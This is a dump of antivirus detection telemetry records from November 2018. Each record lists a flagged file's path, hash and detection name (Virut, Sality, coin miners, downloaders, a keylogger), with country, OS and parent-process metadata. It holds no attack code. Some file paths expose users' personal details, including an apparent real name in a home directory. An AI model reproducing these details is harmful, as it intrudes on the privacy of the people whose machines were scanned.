  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe633_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe633 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T00:42:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\miner.crypto.tm\\miners\\Win\\Equihash\\Ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Programs\\miner.crypto.tm\\Crypto Miner.exe', parentsize=67460040, timestamp='2018-11-04T02:23:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Dokumen KOPRASAI\\Prog_LPD\\Exeprog\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='121fad9ff450248f008b355e0d3d7d9e34efcdde13881e8d10bf6ba3cb7c8005', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:30:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8819', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8819', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:30:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T02:10:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='\\\\\\/Embedding', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T05:42:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T13:04:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:59:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='instdemo.exe', filepath='C:\\Program Files\\Lenovo\\OneKey Optimizer\\bin\\InstDemo.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='cc60da7ff095f3c23898529ec2eb4997affe3d8d01d5d7525c204db1697b2f9b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:nly9O8tcbUem\\\\\\/Gqq.1', country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T16:18:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dfceaceacebdeacebcfbdfbeaceadfbdd.dfceaceacebdeacebcfbdfbeaceadfbdd', filepath='i:\\\xa0\\dfceaceacebdeacebcfbdfbeaceadfbdd.dfceaceacebdeacebcfbdfbeaceadfbdd', filesize=7232000, name='TR/Crypt.ZPACK.Gen7.#M300.#R603873'), hash='3a1b1fbf1704484e51383dcd78466bbc448c23f32297a5b10cc4723ad012edd6', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:41:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:51:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='noi dung kiem tra.exe', filepath='C:\\Users\\X\\Desktop\\khảo sát mô hình tự phòng, tự quản về ANTT\\khảo sát mô hình tự phòng, tự quản về ANTT\\noi dung kiem tra.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='1fa394368878d4cc970b53acb05a257f3cf8d003ccdcfa7fe1d4fdf30e8c83f7', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T01:42:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-164650-352798ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1cda043\\AVSCAN-20181104-164542-2B56EC8B\\AVSCAN-20181104-164650-352798ED', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='grid.dll', filepath='\\\\?\\D:\\门窗天使Windoors_Angel\\grid.dll', filesize=1792000, name='HEUR/AGEN.1009828.#M1.#R1'), hash='2f431694853dc5a22013ebb59e0da95db60fa72a2ed05b01a615f60dd53883ce', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:40:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103636-1f24b554', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4de55e\\AVSCAN-20181104-103619-1C8B9BB8\\AVSCAN-20181104-103636-1F24B554', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:36:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d533', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d533', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151145-2ee74a00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5abbdeb8\\AVSCAN-20181104-151032-24159DF7\\AVSCAN-20181104-151145-2EE74A00', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='prounstl.exe', filepath='E:\\Softwares\\Gagibite 61M\\Network\\Intel\\PRO1000\\Win32\\NDIS61\\PROUnstl.exe', filesize=368000, name='W32/Sality.AT.#M1.#R1'), hash='8a753fd74b70f884bc18915fd6ad16488c5ef7ee0adab0c84fcc9f41d9365ea2', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SCIENTER\\RestManage\\RestManage.exe', parentsize=3473408, timestamp='2018-11-04T02:56:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-212547-6de09a54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-212547-6DE09A54', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:25:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214818-6153d36d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-214818-6153D36D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205937-02598d0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a84357d\\AVSCAN-20181104-203037-8C5B05B7\\AVSCAN-20181104-205937-02598D0F', filesize=7168000, name='TR/Crypt.ZPACK.Gen7.#M1.#R1'), hash='a664655308fafed73a4d9c078e48f60eabdb5858ec6104936c0f983c673adac0', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imgtool.exe', filepath='\\\\?\\D:\\العاب\\ASD.Apple.Grand.Theft. Auto.San.Andreas\\ASD.Apple.Grand.Theft. Auto.San.Andreas\\GtaViceCity\\gta زياد\\imgtool20\\IMGTool.exe', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='14f04eace19df3ba8d1b15419f2a5e692bb278f532c264e1b59bb23b60b57611', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:30:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:18:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='system volume information.exe', filepath='F:\\System Volume Information.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904304, timestamp='2018-11-04T21:51:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files (x86)\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='9f64f3b7f684d5557efbc40aa949b0dbf9dbccc36b662e5cc5b2fdc00058f20f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-04T17:49:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='3ce845b71def4059502be3b85b3db4e1ec327bd04cffb0c62fe92ad57482fbca', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T07:16:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='computerdefaults.exe', filepath='C:\\Windows\\System32\\ComputerDefaults.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8aee0c128123617110e6239c2ab6ca42e1b862c101be3f5944ff8f1dfe276d8b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:43:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='final.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku SSJ\\final\\final.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='af7c388430851abc1301d292822555af10a55bd51dcb640ef2841d67e170b264', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230623-377e15b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230623-377E15B7', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='H:\\Users\\X\\Downloads\\Compressed\\Visual Basic 6.0\\Visual Basic 6.0\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='7efe27364a3a1db5e6ec0fffb61906ef30dc83782d4d1f26e4b3b1bb4af55733', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=None, timestamp='2018-11-02T06:45:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m6.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M6\\M6.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='d0abaa2770c095b364482e3f7a6db085b766a71085284fc247412fe241883300', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093521-cc3dfc00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_070e7913\\AVSCAN-20181102-093303-BA858695\\AVSCAN-20181102-093521-CC3DFC00', filesize=776000, name='PUA/SearchProtect.#M1.#R1'), hash='df6f18bce3dc95ea14da9545229330467cb5459ab63b05c1d994a48297905b4f', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:35:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scrcons.exe', filepath='H:\\TẤT CẢ\\KHONG DUOC XOA\\O C\\WINDOWS\\system32\\wbem\\scrcons.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='aafd271df63b2545afcfae86b16e90ca1a0e5642b5eb54fa797eeec1900631dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130036-5c6d0ef5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3989d88a\\AVSCAN-20181102-125918-52FB0DC2\\AVSCAN-20181102-130036-5C6D0EF5', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ep44ot8k.exe', filepath='C:\\Program Files\\AWOOOMLMR5\\7EP44OT8K.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T15:34:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='font.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\font\\font.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e6d68b5eed0cbce4145b24155c1f85427466ca37587fb37f4f1d49587fb381ae', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~seb5ff.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seB5FF.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='77970e54286c4b00c7dba400cfd62f3b70d859bb50e591c411aea0427d5f0507', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:04:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='update-smadav.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Smadav\\Update-Smadav.exe', filesize=448000, name='TR/Crypt.XPACK.Gen.#M300.#R3829'), hash='893e1e4a775ce897fb9d5a31ab97e126cc4502da521ccc4dbbd2ecf57c894af1', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\Smadav-Updater.exe', parentsize=73728, timestamp='2018-11-02T07:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lostlands_icespell_ce.wrp.exe', filepath='D:\\ИГРУШКИ\\Затерянные земли. Ледяное заклятие X\\LostLands_IceSpell_CE.wrp.exe', filesize=3200000, name='HEUR/AGEN.1027017.#M1.#R1'), hash='ddf358abc237458efcff4f27d79f790fc905dbc4e1258eb43d0d80a51be54bee', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstaller.exe', filepath='\\\\?\\C:\\Program Files\\NPMB1ZB4Z7\\uninstaller.exe', filesize=192000, name='TR/Dropper.Gen.#M300.#R4133'), hash='ea132d9599c4b7d1031592e250b738eef2a2a285c325a23421d2f8e918699ac7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082306-8c65d68a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_90a320b9\\AVSCAN-20181102-082223-82AAC5F3\\AVSCAN-20181102-082306-8C65D68A', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vegeta ssj.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Vegeta SSJ\\Vegeta SSJ.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e8a7986b16083db7365797aed661ac5d43d4c5cb05205a55ff74b76ae7ff499c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c1ac1bb865024474e2d18e95a9b7dc08bd35751d872cf3042864901d04ab864b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:57:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155337-516a019f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb8c0ccb\\AVSCAN-20181102-155230-4B24FD17\\AVSCAN-20181102-155337-516A019F', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090138-ca8f551c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdbb2d48\\AVSCAN-20181102-085611-9B1742F6\\AVSCAN-20181102-090138-CA8F551C', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9e3d68102514cb64cce77a8645febc9ea6b04533ea84773741299666deb52220', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nfregdrv64.exe', filepath='C:\\Program Files\\Maiigewovc\\nfregdrv64.exe', filesize=92000, name='HEUR/AGEN.1007429.#M1.#R1'), hash='bd2bd603f395c4f4d1613519630b49062fb799ce142f338d4fee594e93b2bca9', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ttz0BU\\\\\\/840yxRBeq.1', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:05:48Z'), dt=datetime.date(2018, 11, 2)),
